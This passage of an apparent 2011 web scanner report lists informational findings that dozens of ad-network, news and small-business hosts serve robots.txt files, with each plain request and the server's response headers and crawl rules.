Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Mon, 02 May 2011 02:09:18 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /
30.20. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Sun, 01 May 2011 23:25:06 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
30.21. http://insurancenewsnet.com/article.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: insurancenewsnet.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 04 Apr 2011 20:01:21 GMT
Accept-Ranges: bytes
ETag: "bd67b4113f3cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:27 GMT
Connection: close
Content-Length: 852

# Robots.txt file created by http://www.instantposition.com
# For domain: http://www.insurancenewsnet.com

# All robots will spider the domain
User-agent: *
Disallow: /admin
disallow: /App_code
...[SNIP]...
30.22. http://loadm.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /load/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: loadm.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "3895397314"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Mon, 02 May 2011 01:58:27 GMT
Server: HTTP server

User-agent: *
Disallow: /
30.23. http://loadus.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: loadus.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-671023721"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server

User-agent: *
Disallow: /
30.24. http://map.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 02 May 2011 02:35:32 GMT
Connection: close

# go away
User-agent: *
Disallow: /
30.25. http://media.washingtonpost.com/wp-srv/ad/wpni_generic_ad.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.washingtonpost.com
Path:   /wp-srv/ad/wpni_generic_ad.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: media.washingtonpost.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Fri, 22 Apr 2011 23:10:56 GMT
Content-Type: text/plain; charset=UTF-8
X-Cnection: close
Cache-Control: must-revalidate, max-age=383
Date: Sun, 01 May 2011 23:33:17 GMT
Content-Length: 1142
Connection: close

User-agent: ia_archiver
Disallow: /

User-agent: *
Crawl-delay: 1

# Disallow facets
Disallow: /*_print.html
Disallow: /*_email.html
Disallow: /*_singlePage.html
Disallow: /*_allComments.htm
...[SNIP]...
30.26. http://metrics.washingtonpost.com/b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.washingtonpost.com
Path:   /b/ss/wpnipostcomjobs/1/H.22.1/s96068415066692

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.washingtonpost.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:34:47 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "355146-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www162
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.27. http://n4403ad.doubleclick.net/adj/gn.japanator.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://n4403ad.doubleclick.net
Path:   /adj/gn.japanator.com/home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: n4403ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Mon, 02 May 2011 01:58:40 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
30.28. http://na.decdna.net/n/61239/71938/EI6/x/e  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://na.decdna.net
Path:   /n/61239/71938/EI6/x/e

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: na.decdna.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:08 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 10 Dec 2010 04:06:03 GMT
ETag: "a70050-1a-7907e0c0"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /
30.29. http://news.yahoo.com/s/prweb/20110427/bs_prweb/prweb5276794  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.yahoo.com
Path:   /s/prweb/20110427/bs_prweb/prweb5276794

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: news.yahoo.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:33:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Sun, 10 Apr 2011 16:13:15 GMT
Accept-Ranges: bytes
Content-Length: 193
Content-Type: text/plain; charset=utf-8
Age: 0
Server: YTS/1.19.4

# For domain: http://news.yahoo.com/
# All robots will spider the domain
# Used for better SEO indexing and blocking of certain directories

User-agent: *
Disallow: /*?
Disallow: /topics/*page
30.30. http://online.wsj.com/internal/ModTwitWSJMarkets.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /internal/ModTwitWSJMarkets.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:02 GMT
Server: Apache
Last-Modified: Fri, 29 Apr 2011 15:25:42 GMT
Accept-Ranges: bytes
Content-Length: 1471
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=15
Connection: Keep-Alive
Content-Type: text/plain

##ACAP version=1.0

User-agent: *
Disallow: /article_email/
Disallow: /article_print/
Disallow: /PA2VJBNA4R/
Disallow: /home/
Disallow: /advanced_search/
Disallow: /login/
Disallow: /acct/
D
...[SNIP]...
30.31. http://pagead2.googlesyndication.com/pagead/imgad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 02 May 2011 01:58:47 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
30.32. http://pixel.invitemedia.com/admeld_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:10:28 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
30.33. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 03 May 2011 01:57:46 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 02 May 2011 01:57:46 GMT
Server: QS

User-agent: *
Disallow: /
30.34. http://pubads.g.doubleclick.net/gampad/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 02 May 2011 01:58:08 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
30.35. http://r.turn.com/server/pixel.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Date: Mon, 02 May 2011 02:10:38 GMT
Connection: close

User-agent: *
Disallow: /app
Disallow: /server
30.36. http://router.infolinks.com/gsd/1304319928277.0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://router.infolinks.com
Path:   /gsd/1304319928277.0

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: router.infolinks.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"47-1301491318000"
Last-Modified: Wed, 30 Mar 2011 13:21:58 GMT
Content-Type: text/plain
Content-Length: 47
Date: Mon, 02 May 2011 02:27:41 GMT
Connection: close

# not to be crawled
User-agent: *
Disallow: /

30.37. http://s0.2mdn.net/807725/OSA_Save_It_728x90_NoXML_1loop_102210_v001.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /807725/OSA_Save_It_728x90_NoXML_1loop_102210_v001.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 01 May 2011 18:47:14 GMT
Expires: Sat, 30 Apr 2011 18:05:11 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 17237
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /
30.38. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 01:56:44 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
30.39. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Sun, 01 May 2011 23:34:45 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
30.40. http://static.pulse360.com/blob/fb/6e141bc3_social_security_card.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.pulse360.com
Path:   /blob/fb/6e141bc3_social_security_card.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.pulse360.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:22 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 14:40:58 GMT
ETag: "16fa40-23-6dc53280"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /cgi-bin/

30.41. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/html
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.17.4.1542 Apr 2 2011 16:34:52 ewr-pixel-n2a pid 0x6b3c 27452
Connection: keep-alive
Content-Length: 26

User-agent: *
Disallow: *
30.42. http://tag.admeld.com/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /match

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Fri, 29 Apr 2011 14:38:19 GMT
ETag: "683aba-1a-4a20f9ff9ccc0"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Mon, 02 May 2011 02:06:10 GMT
Connection: close

User-agent: *
Disallow: /
30.43. http://translate.googleapis.com/translate_a/l  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_a/l

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.googleapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 25 Mar 2010 09:42:43 GMT
Date: Mon, 02 May 2011 02:28:15 GMT
Expires: Mon, 02 May 2011 02:28:15 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
30.44. http://us.bc.yahoo.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.bc.yahoo.com
Path:   /b

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: us.bc.yahoo.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:33:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 03 Mar 2006 21:55:13 GMT
Accept-Ranges: bytes
Content-Length: 41
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

# Do not crawl
User-agent: *
Disallow: /
30.45. http://usjobsresource.com/3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /3

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usjobsresource.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:57 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 17 Jan 2011 18:44:38 GMT
ETag: "fccc3e-17-49a0f2d0f3180"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
30.46. http://va.px.invitemedia.com/goog_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /goog_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /
30.47. http://view.atdmt.com/ADO/view/284156785/direct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /ADO/view/284156785/direct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: view.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Last-Modified: Mon, 19 Oct 2009 19:29:35 GMT
Accept-Ranges: bytes
ETag: "4c95727df250ca1:0"
Date: Mon, 02 May 2011 02:20:10 GMT
Connection: close
Content-Length: 101

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:
30.48. http://websiteprice.net/result/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://websiteprice.net
Path:   /result/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: websiteprice.net

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 22 Oct 2009 09:06:37 GMT
Accept-Ranges: bytes
ETag: "4004f6f652ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 02:15:22 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:
30.49. http://widgets.digg.com/buttons/count  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.digg.com

Response

HTTP/1.1 200 OK
Age: 0
Date: Sun, 01 May 2011 23:25:00 GMT
Via: NS-CACHE: 100
Server: Apache
Last-Modified: Sun, 27 Jul 2008 09:42:54 GMT
Accept-Ranges: bytes
X-Digg-Time: D=302 (null)
Content-Type: text/plain; charset=UTF-8
Cache-Control: private, max-age=86399
Expires: Mon, 02 May 2011 23:24:59 GMT
X-CDN: Cotendo
Connection: close

User-agent: *
Disallow: /
30.50. http://www.1728.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1728.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.1728.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:42 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 18 Jan 2011 04:01:47 GMT
ETag: "11460255-8e-49a16f59540c0"
Accept-Ranges: bytes
Content-Length: 142
Connection: close
Content-Type: text/plain

# robots.txt file for http://www.1728.com/
User-agent: Mediapartners-Google
Disallow:
sitemap: http://cdn.attracta.com/sitemap/505654.xml.gz

30.51. http://www.3fatchicks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.3fatchicks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.3fatchicks.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:52 GMT
Server: Apache
Last-Modified: Fri, 12 Jun 2009 18:24:53 GMT
ETag: "1e02d19-49-46c2ad31a8740"
Accept-Ranges: bytes
Content-Length: 73
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerthreefatchicks_pool=518262956.20480.0000; path=/

User-agent: *
Allow: /

Sitemap: http://www.3fatchicks.com/sitemap.xml
30.52. http://www.4tubehd.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4tubehd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.4tubehd.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:41 GMT
Server: Apache/2.2.16 (FreeBSD) DAV/2 PHP/5.3.5 with Suhosin-Patch
Last-Modified: Tue, 20 May 2008 22:13:35 GMT
ETag: "311987f-19-44db0ca9221c0"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
30.53. http://www.6mmbr.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.6mmbr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.6mmbr.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 24 Mar 2011 20:33:23 GMT
Accept-Ranges: bytes
ETag: "8667cbb862eacb1:0"
Server: Microsoft-IIS/7.5
Date: Sun, 01 May 2011 23:48:24 GMT
Connection: close
Content-Length: 24

User-agent: *
Disallow:
30.54. http://www.aacap.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aacap.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aacap.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:13:52 GMT
Server: Apache/2.0.52 (CentOS)
Cache-Control: private
ETag: "+2/Rq4oKdog"
Last-Modified: Tue, 07 Sep 2010 15:14:15 GMT
Accept-Ranges: bytes
Content-Length: 35
Set-Cookie: JSESSIONID=ah6XIflHoim6olDdU_; path=/
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /galleries/
30.55. http://www.abcpaydaydirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abcpaydaydirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abcpaydaydirect.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:20 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.5 mod_ssl/2.8.31 OpenSSL/0.9.8q
Last-Modified: Fri, 14 Jan 2011 20:11:47 GMT
ETag: "87360f-e7-4d30ae03"
Accept-Ranges: bytes
Content-Length: 231
Connection: close
Content-Type: text/plain

User-Agent: *

Disallow: /_old/
Disallow: /inc/
Disallow: /includes/
Disallow: /privacy/
Disallow: /terms/
Disallow: /unsub/

Noindex: /_old/
Noindex: /inc/
Noindex: /includes/
Noindex: /privacy/
Noin
...[SNIP]...
30.56. http://www.abdopain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abdopain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.abdopain.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:18 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.abdopain.com/WkgX1zul.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dyn/
Disall
...[SNIP]...
30.57. http://www.acadiaferry.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.acadiaferry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.acadiaferry.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:49 GMT
Server: Apache/1.3.42 (Unix) Resin/2.1.13 mod_fastcgi/2.4.6 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Wed, 05 Jan 2011 19:39:00 GMT
ETag: "2df0fcf-178-4d24c8d4"
Accept-Ranges: bytes
Content-Length: 376
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
30.58. http://www.accesskansas.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.accesskansas.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.accesskansas.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:11 GMT
Server: Apache
Last-Modified: Wed, 30 Mar 2011 14:31:12 GMT
ETag: "468ae-38-7490c00"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerSTAT-01=eVtIU3dKLJrl1pdi2/r4yXnQdKxpyo1dQkeY2O35cQ8ZClT4BZIgeVWBJPvTHcqdNgnMMm/FWdQvrg==; path=/

User-agent: *
Disallow: /cgi-bin/
Disallow: /amber.html
30.59. http://www.aces.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aces.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.aces.edu

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:35 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 22 Feb 2008 17:11:56 GMT
ETag: "14386c5-fa-51c04f00"
Accept-Ranges: bytes
Content-Length: 250
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /user/
Disallow: /users/
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/
Disallow: /aawm/Modules/
Disallow: /temp/
Disallow
...[SNIP]...
30.60. http://www.activexguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.activexguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.activexguide.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.9
Last-Modified: Fri, 12 Feb 2010 02:33:23 GMT
ETag: "450357-130-47f5e176522c0"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...
30.61. http://www.allelectronics.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allelectronics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.allelectronics.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:29 GMT
Server: Apache
Last-Modified: Thu, 15 May 2008 15:59:14 GMT
ETag: "14b580c-24-482c5dd2"
Accept-Ranges: bytes
Content-Length: 36
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /index.php?
30.62. http://www.alphashark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alphashark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.alphashark.com

Response

HTTP/1.1 200 OK
Content-Length: 2590
Content-Type: text/plain
Last-Modified: Wed, 28 Apr 2010 08:15:14 GMT
Accept-Ranges: bytes
ETag: "055afedaae6ca1:10e2"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:47:45 GMT
Connection: close

User-agent: *
Disallow: /ASPDNSFCommon/
Disallow: /ASPDNSFEncrypt/
